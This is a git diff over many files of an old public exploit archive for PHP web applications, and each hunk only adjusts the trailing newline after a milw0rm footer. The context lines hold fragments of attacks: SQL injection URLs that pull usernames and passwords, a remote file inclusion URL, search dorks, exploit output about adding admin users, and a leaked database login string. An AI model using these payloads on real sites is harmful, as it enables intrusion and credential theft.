b/platforms/php/webapps/5554.php index 9159048b1..f172300ea 100755 --- a/platforms/php/webapps/5554.php +++ b/platforms/php/webapps/5554.php @@ -34,4 +34,4 @@ else { ?> -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/5555.txt b/platforms/php/webapps/5555.txt index 2cf17126d..98c59c546 100755 --- a/platforms/php/webapps/5555.txt +++ b/platforms/php/webapps/5555.txt @@ -34,4 +34,4 @@ -------------------------------------------[End of context]---------------------------------------- -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/5557.pl b/platforms/php/webapps/5557.pl index 3f51a11f3..4521d36b4 100755 --- a/platforms/php/webapps/5557.pl +++ b/platforms/php/webapps/5557.pl @@ -69,4 +69,4 @@ if($i == 32) { system('pause'); }} -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/5558.txt b/platforms/php/webapps/5558.txt index f6e472b30..3481b1987 100755 --- a/platforms/php/webapps/5558.txt +++ b/platforms/php/webapps/5558.txt @@ -32,4 +32,4 @@ Tryag TeaM & All Members Of My Forum & Anyone Hate Me :) -==========================================[ ViVa Islam + YeMeN ]====================================- -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/5559.txt b/platforms/php/webapps/5559.txt index 1c54e7de3..a4c8e579a 100755 --- a/platforms/php/webapps/5559.txt +++ b/platforms/php/webapps/5559.txt @@ -33,4 +33,4 @@ young iranian h4ck3rz /* tnx 2: st0rke,aria-security.net,r00tsecurity.org,all h4ck3rz */ -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/5560.txt b/platforms/php/webapps/5560.txt index d403f0fba..95294601b 100755 --- a/platforms/php/webapps/5560.txt +++ b/platforms/php/webapps/5560.txt @@ -38,4 +38,4 @@ http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr =============================================================== -# milw0rm.com [2008-05-07] +# milw0rm.com [2008-05-07] \ No newline at end of file diff --git a/platforms/php/webapps/5562.py b/platforms/php/webapps/5562.py index 5f7cc372c..bf61ace9e 100755 --- a/platforms/php/webapps/5562.py +++ b/platforms/php/webapps/5562.py @@ -146,4 +146,4 @@ response = urllib2.urlopen(req) if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-" else: print "[-] Unable to send message" -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/5565.pl b/platforms/php/webapps/5565.pl index 1cb912330..5f62bb8b6 100755 --- a/platforms/php/webapps/5565.pl +++ b/platforms/php/webapps/5565.pl @@ -40,4 +40,4 @@ print "Example: ./vshare.pl www.site.com\n"; exit(0); } -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/5566.txt b/platforms/php/webapps/5566.txt index 45dd76843..33c7f979f 100755 --- a/platforms/php/webapps/5566.txt +++ b/platforms/php/webapps/5566.txt @@ -34,4 +34,4 @@ Tryag TeaM & All Members Of My Forum & Anyone Hate Me :) -==========================================[ ViVa Islam + YeMeN ]====================================- -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/5567.txt b/platforms/php/webapps/5567.txt index 238253379..8a7a43430 100755 --- a/platforms/php/webapps/5567.txt +++ b/platforms/php/webapps/5567.txt @@ -30,4 +30,4 @@ Tryag TeaM & All Members Of My Forum & Anyone Hate Me :) -==========================================[ ViVa Islam + YeMeN ]====================================- -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/5568.txt b/platforms/php/webapps/5568.txt index 766bbe50a..465225c64 100755 --- a/platforms/php/webapps/5568.txt +++ b/platforms/php/webapps/5568.txt @@ -13,4 +13,4 @@ # Ex: http://127.0.0.1/del.php?post_id=1&confirm=yes # Visit http://devilsnight.altervista.org -# milw0rm.com [2008-05-08] +# milw0rm.com [2008-05-08] \ No newline at end of file diff --git a/platforms/php/webapps/5575.txt b/platforms/php/webapps/5575.txt index 5b9f67075..35fa232bb 100755 --- a/platforms/php/webapps/5575.txt +++ b/platforms/php/webapps/5575.txt @@ -37,4 +37,4 @@ header('Cache-Control: private'); readfile($file_name); -# milw0rm.com [2008-05-09] +# milw0rm.com [2008-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/5576.pl b/platforms/php/webapps/5576.pl index 61a4db5d1..7e6557685 100755 --- a/platforms/php/webapps/5576.pl +++ b/platforms/php/webapps/5576.pl @@ -39,4 +39,4 @@ my $victim = $ARGV[0]; print "\n[-] exploit failed\n"; } -# milw0rm.com [2008-05-09] +# milw0rm.com [2008-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/5577.txt b/platforms/php/webapps/5577.txt index 1950011a8..6bca4064f 100755 --- a/platforms/php/webapps/5577.txt +++ b/platforms/php/webapps/5577.txt @@ -25,4 +25,4 @@ >>>my best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy -x and all freinds >>> all muslims -# milw0rm.com [2008-05-09] +# milw0rm.com [2008-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/5578.txt b/platforms/php/webapps/5578.txt index eaf68825b..cdd8858e4 100755 --- a/platforms/php/webapps/5578.txt +++ b/platforms/php/webapps/5578.txt @@ -141,4 +141,4 @@ Contact: ################################ [ EOF ] ################################## -# milw0rm.com [2008-05-09] +# milw0rm.com [2008-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/5579.htm b/platforms/php/webapps/5579.htm index c13fcf4bf..13e4fd9d6 100755 --- a/platforms/php/webapps/5579.htm +++ b/platforms/php/webapps/5579.htm @@ -17,4 +17,4 @@ Greetz : irk4z, GregStar, ZaBeaTy, ElusiveN, Avanturka :*** -# milw0rm.com [2008-05-09] +# milw0rm.com [2008-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/5580.txt b/platforms/php/webapps/5580.txt index 6a6f6be16..4fba51d66 100755 --- a/platforms/php/webapps/5580.txt +++ b/platforms/php/webapps/5580.txt @@ -36,4 +36,4 @@ Dark MaSTer :: HaCkEr-EGy :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: SecuritY F (( Geek InjEcT0r )) -# milw0rm.com [2008-05-09] +# milw0rm.com [2008-05-09] \ No newline at end of file diff --git a/platforms/php/webapps/5581.txt b/platforms/php/webapps/5581.txt index 88a72a1fe..3ca445299 100755 --- a/platforms/php/webapps/5581.txt +++ b/platforms/php/webapps/5581.txt @@ -15,4 +15,4 @@ http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username, --------------------- ############################################### -# milw0rm.com [2008-05-10] +# milw0rm.com [2008-05-10] \ No newline at end of file diff --git a/platforms/php/webapps/5582.txt b/platforms/php/webapps/5582.txt index 7882b33e8..3385b7047 100755 --- a/platforms/php/webapps/5582.txt +++ b/platforms/php/webapps/5582.txt @@ -69,4 +69,4 @@ $image_result = mysql_query("SELECT * FROM uploaded_images where id =" . (int)$_GET['id'], $db); -# milw0rm.com [2008-05-10] +# milw0rm.com [2008-05-10] \ No newline at end of file diff --git a/platforms/php/webapps/5583.php b/platforms/php/webapps/5583.php index 60e59fee9..5e963dbfe 100755 --- a/platforms/php/webapps/5583.php +++ b/platforms/php/webapps/5583.php @@ -87,4 +87,4 @@ for($i=33;$i<=49;$i++){ } echo $pass; -# milw0rm.com [2008-05-10] +# milw0rm.com [2008-05-10] \ No newline at end of file diff --git a/platforms/php/webapps/5587.pl b/platforms/php/webapps/5587.pl index 82508e0e8..6161abbad 100755 --- a/platforms/php/webapps/5587.pl +++ b/platforms/php/webapps/5587.pl @@ -68,4 +68,4 @@ else{print "\n[-] Exploit Failed...\n";} #exploit discovered by Houssamix From H-T Team # exploit exploited by Stack-Terrorist -# milw0rm.com [2008-05-11] +# milw0rm.com [2008-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/5588.php b/platforms/php/webapps/5588.php index df4a84666..f0369a8dc 100755 --- a/platforms/php/webapps/5588.php +++ b/platforms/php/webapps/5588.php @@ -64,4 +64,4 @@ echo "\n".'Not enough arguments!'."\n"; } ?> -# milw0rm.com [2008-05-11] +# milw0rm.com [2008-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/5589.php b/platforms/php/webapps/5589.php index d9ace6360..0e8d981a9 100755 --- a/platforms/php/webapps/5589.php +++ b/platforms/php/webapps/5589.php @@ -67,4 +67,4 @@ print_r(' } ?> -# milw0rm.com [2008-05-11] +# milw0rm.com [2008-05-11] \ No newline at end of file diff --git a/platforms/php/webapps/5590.txt b/platforms/php/webapps/5590.txt index e3eaa2f91..084cdcdff 100755 --- a/platforms/php/webapps/5590.txt +++ b/platforms/php/webapps/5590.txt @@ -48,4 +48,4 @@ peace, t0pP8uZz --==+ AJ Article 1.0 (featured_article.php) Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5591.txt b/platforms/php/webapps/5591.txt index b88c55964..792bd395e 100755 --- a/platforms/php/webapps/5591.txt +++ b/platforms/php/webapps/5591.txt @@ -46,4 +46,4 @@ peace, t0pP8uZz --==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5592.txt b/platforms/php/webapps/5592.txt index 2c69cffe6..94a676fba 100755 --- a/platforms/php/webapps/5592.txt +++ b/platforms/php/webapps/5592.txt @@ -49,4 +49,4 @@ peace, t0pP8uZz --==+ AJ Classifieds 2008 (index.php) Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5594.txt b/platforms/php/webapps/5594.txt index 31f4850b5..cdbb15f0a 100755 --- a/platforms/php/webapps/5594.txt +++ b/platforms/php/webapps/5594.txt @@ -46,4 +46,4 @@ peace, t0pP8uZz --==+ ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5595.txt b/platforms/php/webapps/5595.txt index 33633563f..bf3f0be08 100755 --- a/platforms/php/webapps/5595.txt +++ b/platforms/php/webapps/5595.txt @@ -58,4 +58,4 @@ Dersler BasladI Sanal Bitti :((( ########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ############################## -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5596.txt b/platforms/php/webapps/5596.txt index 6ba54accc..bc6c43a53 100755 --- a/platforms/php/webapps/5596.txt +++ b/platforms/php/webapps/5596.txt @@ -49,4 +49,4 @@ Lines: ----------------------------------------------[/code] -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5597.pl b/platforms/php/webapps/5597.pl index 915acdd8e..8b3fe848a 100755 --- a/platforms/php/webapps/5597.pl +++ b/platforms/php/webapps/5597.pl @@ -156,4 +156,4 @@ print "\t\t# Exploit has ben aported user and password hash #\n\n";} else{print "\n[-] Exploit Failed...\n";} # exploit exploited by Stack-Terrorist -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5598.txt b/platforms/php/webapps/5598.txt index 44046a6b4..7478988e9 100755 --- a/platforms/php/webapps/5598.txt +++ b/platforms/php/webapps/5598.txt @@ -33,4 +33,4 @@ dork: "Powered by: MFH v1" ####################################### -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5599.txt b/platforms/php/webapps/5599.txt index d71a78d96..73b383245 100755 --- a/platforms/php/webapps/5599.txt +++ b/platforms/php/webapps/5599.txt @@ -65,4 +65,4 @@ <<->> All muslims -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5600.php b/platforms/php/webapps/5600.php index 18e2dbc10..f4a10fc6d 100755 --- a/platforms/php/webapps/5600.php +++ b/platforms/php/webapps/5600.php @@ -154,4 +154,4 @@ while(1) ?> -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5601.pl b/platforms/php/webapps/5601.pl index d23d5ef84..dc7a42531 100755 --- a/platforms/php/webapps/5601.pl +++ b/platforms/php/webapps/5601.pl @@ -87,4 +87,4 @@ else{print "\n[-] Exploit Failed...\n";} #----------------------------------------------------------------------------# ######################################## -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5602.txt b/platforms/php/webapps/5602.txt index a2052ccd1..027ea341e 100755 --- a/platforms/php/webapps/5602.txt +++ b/platforms/php/webapps/5602.txt @@ -62,4 +62,4 @@ <<->> All muslims -# milw0rm.com [2008-05-12] +# milw0rm.com [2008-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/5603.txt b/platforms/php/webapps/5603.txt index 145381ec7..2b155d1c7 100755 --- a/platforms/php/webapps/5603.txt +++ b/platforms/php/webapps/5603.txt @@ -35,4 +35,4 @@ echo "\n\n"; ?> -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5604.txt b/platforms/php/webapps/5604.txt index 6c7551feb..ddc010ece 100755 --- a/platforms/php/webapps/5604.txt +++ b/platforms/php/webapps/5604.txt @@ -22,4 +22,4 @@ Example: [+] Dork: inurl:/macgurublog_menu/ [+] Notes: Not to Turkish Warrior, good job on leaking CipherCrew exploits and submiting them as your own dumbass! ;) -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5605.txt b/platforms/php/webapps/5605.txt index 879168d26..32933d309 100755 --- a/platforms/php/webapps/5605.txt +++ b/platforms/php/webapps/5605.txt @@ -18,4 +18,4 @@ for exmp : http://www.xxx.com/e107_plugins/zogo-shop/products.php?cat=-1+union+select+database(),version(),3,4,5,6,user()/* -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5606.txt b/platforms/php/webapps/5606.txt index d6a955979..d63de1515 100755 --- a/platforms/php/webapps/5606.txt +++ b/platforms/php/webapps/5606.txt @@ -30,4 +30,4 @@ http://[target]/[path]/message.php?action=showfolder&folderid=[SQL-STATEMENT] The Vendor has not been contacted yet. -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5607.txt b/platforms/php/webapps/5607.txt index 09059e623..6c8c7451c 100755 --- a/platforms/php/webapps/5607.txt +++ b/platforms/php/webapps/5607.txt @@ -18,4 +18,4 @@ ---------------------------------------------------------------------------- [*] Greetings : Str0ke, all friends & muslims HaCkeRs... -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5609.txt b/platforms/php/webapps/5609.txt index 16d666ab1..b3e5cf901 100755 --- a/platforms/php/webapps/5609.txt +++ b/platforms/php/webapps/5609.txt @@ -46,4 +46,4 @@ ################################################################################# -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/561.sh b/platforms/php/webapps/561.sh index 181ffcc2e..21b9c7616 100755 --- a/platforms/php/webapps/561.sh +++ b/platforms/php/webapps/561.sh @@ -29,4 +29,4 @@ Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog. http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/* -# milw0rm.com [2004-09-28] +# milw0rm.com [2004-09-28] \ No newline at end of file diff --git a/platforms/php/webapps/5610.txt b/platforms/php/webapps/5610.txt index bae19b7f1..ae183cf70 100755 --- a/platforms/php/webapps/5610.txt +++ b/platforms/php/webapps/5610.txt @@ -28,4 +28,4 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5611.txt b/platforms/php/webapps/5611.txt index 95be5e02f..989297b08 100755 --- a/platforms/php/webapps/5611.txt +++ b/platforms/php/webapps/5611.txt @@ -43,4 +43,4 @@ ################################################################################# -# milw0rm.com [2008-05-13] +# milw0rm.com [2008-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/5613.txt b/platforms/php/webapps/5613.txt index dfecd385a..4e295a744 100755 --- a/platforms/php/webapps/5613.txt +++ b/platforms/php/webapps/5613.txt @@ -48,4 +48,4 @@ peace, t0pP8uZz --==+ Freelance Auction Script 1.0 (browseproject.php) SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5614.txt b/platforms/php/webapps/5614.txt index 2c731677f..c61019c2c 100755 --- a/platforms/php/webapps/5614.txt +++ b/platforms/php/webapps/5614.txt @@ -49,4 +49,4 @@ peace, t0pP8uZz --==+ Feedback and Rating Script 1.0 (detail.php) Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5615.txt b/platforms/php/webapps/5615.txt index a27df72ce..b6588ad82 100755 --- a/platforms/php/webapps/5615.txt +++ b/platforms/php/webapps/5615.txt @@ -51,4 +51,4 @@ peace, t0pP8uZz --==+ AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5616.txt b/platforms/php/webapps/5616.txt index ebc0818bd..fae6d1e88 100755 --- a/platforms/php/webapps/5616.txt +++ b/platforms/php/webapps/5616.txt @@ -50,4 +50,4 @@ peace, t0pP8uZz --==+ ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5617.txt b/platforms/php/webapps/5617.txt index 3f56a9fab..67e91e489 100755 --- a/platforms/php/webapps/5617.txt +++ b/platforms/php/webapps/5617.txt @@ -51,4 +51,4 @@ peace, t0pP8uZz --==+ Internet Photoshow (Special Edition) Insecure Cookie Handling +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5618.txt b/platforms/php/webapps/5618.txt index 845d00007..2984cbd70 100755 --- a/platforms/php/webapps/5618.txt +++ b/platforms/php/webapps/5618.txt @@ -152,4 +152,4 @@ while(1) ?> -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5620.txt b/platforms/php/webapps/5620.txt index 788365acd..3adbc5b1a 100755 --- a/platforms/php/webapps/5620.txt +++ b/platforms/php/webapps/5620.txt @@ -50,4 +50,4 @@ http://www.target.com/include/bbs.lib.inc.php?site_path=evilthingg0ezhere /**/ PozdraF : deckima s elitesecurity.org i cyber-underground.org =============================================================== -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5621.txt b/platforms/php/webapps/5621.txt index 189b1caec..5ed7d3d5a 100755 --- a/platforms/php/webapps/5621.txt +++ b/platforms/php/webapps/5621.txt @@ -41,4 +41,4 @@ include($main_page_directory.$page_to_include); ################################################################################# -# milw0rm.com [2008-05-14] +# milw0rm.com [2008-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/5623.txt b/platforms/php/webapps/5623.txt index 67ffc7c32..722bf50c7 100755 --- a/platforms/php/webapps/5623.txt +++ b/platforms/php/webapps/5623.txt @@ -35,4 +35,4 @@ http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file( --- young iranian h4ck3rz -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5624.txt b/platforms/php/webapps/5624.txt index 85a0b6034..2fa9d19f4 100755 --- a/platforms/php/webapps/5624.txt +++ b/platforms/php/webapps/5624.txt @@ -19,4 +19,4 @@ mysql||localhost||newsmanager||root||mahmood4li /login/info.php Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs :) -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5626.txt b/platforms/php/webapps/5626.txt index b6fb52c77..364cd6a32 100755 --- a/platforms/php/webapps/5626.txt +++ b/platforms/php/webapps/5626.txt @@ -40,4 +40,4 @@ ################################################################################# -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5627.pl b/platforms/php/webapps/5627.pl index 79dcb99c8..c96b8164f 100755 --- a/platforms/php/webapps/5627.pl +++ b/platforms/php/webapps/5627.pl @@ -24,4 +24,4 @@ if($ob->is_success && index($ob->content, 10) != -1) { print "\n\nUser Added Successfully! Login to: $url\n"; } else { print "\n\nUser was not added. Username may be in use, or site isnt running PGMS.\n"; } -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5628.txt b/platforms/php/webapps/5628.txt index 544191502..fb89208bd 100755 --- a/platforms/php/webapps/5628.txt +++ b/platforms/php/webapps/5628.txt @@ -82,4 +82,4 @@ peace, t0pP8uZz --==+ RantX 1.0 Insecure Admin Authentication Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5629.txt b/platforms/php/webapps/5629.txt index f619de03c..e3931988c 100755 --- a/platforms/php/webapps/5629.txt +++ b/platforms/php/webapps/5629.txt @@ -55,4 +55,4 @@ peace, t0pP8uZz --==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5630.txt b/platforms/php/webapps/5630.txt index 830094db8..21dff20bd 100755 --- a/platforms/php/webapps/5630.txt +++ b/platforms/php/webapps/5630.txt @@ -54,4 +54,4 @@ peace, t0pP8uZz --==+ Multi-Page Comment System 1.1.0 Insecure Cookie Handling +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5631.txt b/platforms/php/webapps/5631.txt index 02d9f13a5..9d00d2a0e 100755 --- a/platforms/php/webapps/5631.txt +++ b/platforms/php/webapps/5631.txt @@ -8,4 +8,4 @@ http://[attacked_box]/[imgallery]/galeria.php?start=0&kategoria='+union+select+h http://[attacked_box]/[imgallery]/popup/koment.php?id_phot='-1+union+select+1,2,3,4,haslo+from+imgallery_hasla/* http://[attacked_box]/[imgallery]/popup/opis.php?id_phot='+union+select+haslo+from+imgallery_hasla/* -# milw0rm.com [2008-05-15] +# milw0rm.com [2008-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/5634.htm b/platforms/php/webapps/5634.htm index edab92e47..5692d9dea 100755 --- a/platforms/php/webapps/5634.htm +++ b/platforms/php/webapps/5634.htm @@ -46,4 +46,4 @@ http://******/admin/themes.php // If there is a right of entry you can fill she ========================= WEBXAKEP.NET =========================== -# milw0rm.com [2008-05-16] +# milw0rm.com [2008-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/5635.pl b/platforms/php/webapps/5635.pl index 821ff2b0f..1cdc5de04 100755 --- a/platforms/php/webapps/5635.pl +++ b/platforms/php/webapps/5635.pl @@ -73,4 +73,4 @@ else{print "\n[-] Exploit Failed...\n";} #-------------------Exploit exploited by Stack-Terrorist --------------------# ######################################## -# milw0rm.com [2008-05-16] +# milw0rm.com [2008-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/5636.txt b/platforms/php/webapps/5636.txt index 1eb92d15b..371116587 100755 --- a/platforms/php/webapps/5636.txt +++ b/platforms/php/webapps/5636.txt @@ -9,4 +9,4 @@ http://localhost/path/upload/force_download.php?file=force_download.php thnx : alah -# milw0rm.com [2008-05-16] +# milw0rm.com [2008-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/5637.txt b/platforms/php/webapps/5637.txt index 687ad810f..fee941d0e 100755 --- a/platforms/php/webapps/5637.txt +++ b/platforms/php/webapps/5637.txt @@ -16,4 +16,4 @@ --------- -# milw0rm.com [2008-05-17] +# milw0rm.com [2008-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/5638.txt b/platforms/php/webapps/5638.txt index 9fcb59e19..e2e9c9a00 100755 --- a/platforms/php/webapps/5638.txt +++ b/platforms/php/webapps/5638.txt @@ -50,4 +50,4 @@ http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5, # Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C # ################################################################## -# milw0rm.com [2008-05-17] +# milw0rm.com [2008-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/5639.pl b/platforms/php/webapps/5639.pl index d0ccf865b..a34297da1 100755 --- a/platforms/php/webapps/5639.pl +++ b/platforms/php/webapps/5639.pl @@ -515,4 +515,4 @@ sub help { exit(1); } -# milw0rm.com [2008-05-17] +# milw0rm.com [2008-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/5640.py b/platforms/php/webapps/5640.py index 36bf62443..d35d489eb 100755 --- a/platforms/php/webapps/5640.py +++ b/platforms/php/webapps/5640.py @@ -93,4 +93,4 @@ print '----------------------------------------------------------' #EOFF -# milw0rm.com [2008-05-17] +# milw0rm.com [2008-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/5641.txt b/platforms/php/webapps/5641.txt index d3b5a75cc..bc7981598 100755 --- a/platforms/php/webapps/5641.txt +++ b/platforms/php/webapps/5641.txt @@ -27,4 +27,4 @@ ******************************************************************************************* -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5642.txt b/platforms/php/webapps/5642.txt index 77c4461d9..027578c6f 100755 --- a/platforms/php/webapps/5642.txt +++ b/platforms/php/webapps/5642.txt @@ -33,4 +33,4 @@ ******************************************************************************************* -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5643.txt b/platforms/php/webapps/5643.txt index 6b9b70b7c..29da3c584 100755 --- a/platforms/php/webapps/5643.txt +++ b/platforms/php/webapps/5643.txt @@ -27,4 +27,4 @@ ******************************************************************************************* -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5644.txt b/platforms/php/webapps/5644.txt index 5182f774e..75e25c1ee 100755 --- a/platforms/php/webapps/5644.txt +++ b/platforms/php/webapps/5644.txt @@ -121,4 +121,4 @@ if($i == 32) { # http://cod3rz.helloweb.eu -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5645.txt b/platforms/php/webapps/5645.txt index 685d27440..bc38794af 100755 --- a/platforms/php/webapps/5645.txt +++ b/platforms/php/webapps/5645.txt @@ -60,4 +60,4 @@ --==+ AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5646.txt b/platforms/php/webapps/5646.txt index 40cd1abaf..c7b22e4f2 100755 --- a/platforms/php/webapps/5646.txt +++ b/platforms/php/webapps/5646.txt @@ -64,4 +64,4 @@ peace, t0pP8uZz --==+ easyCMS <= 0.4.2 Multiple Remote Vulnerabilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5647.txt b/platforms/php/webapps/5647.txt index a3fe1d4bc..ebe5828d6 100755 --- a/platforms/php/webapps/5647.txt +++ b/platforms/php/webapps/5647.txt @@ -57,4 +57,4 @@ peace, t0pP8uZz --==+ GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/5648.pl b/platforms/php/webapps/5648.pl index b521fb4c0..e01d63e41 100755 --- a/platforms/php/webapps/5648.pl +++ b/platforms/php/webapps/5648.pl @@ -32,4 +32,4 @@ my $ob = $ua->post($url."/admin/adduser.php", { "newusername" => $usr, "newpassw print "Completed! Try logging in ".$url."\n"; exit; -# milw0rm.com [2008-05-18] +# milw0rm.com [2008-05-18] 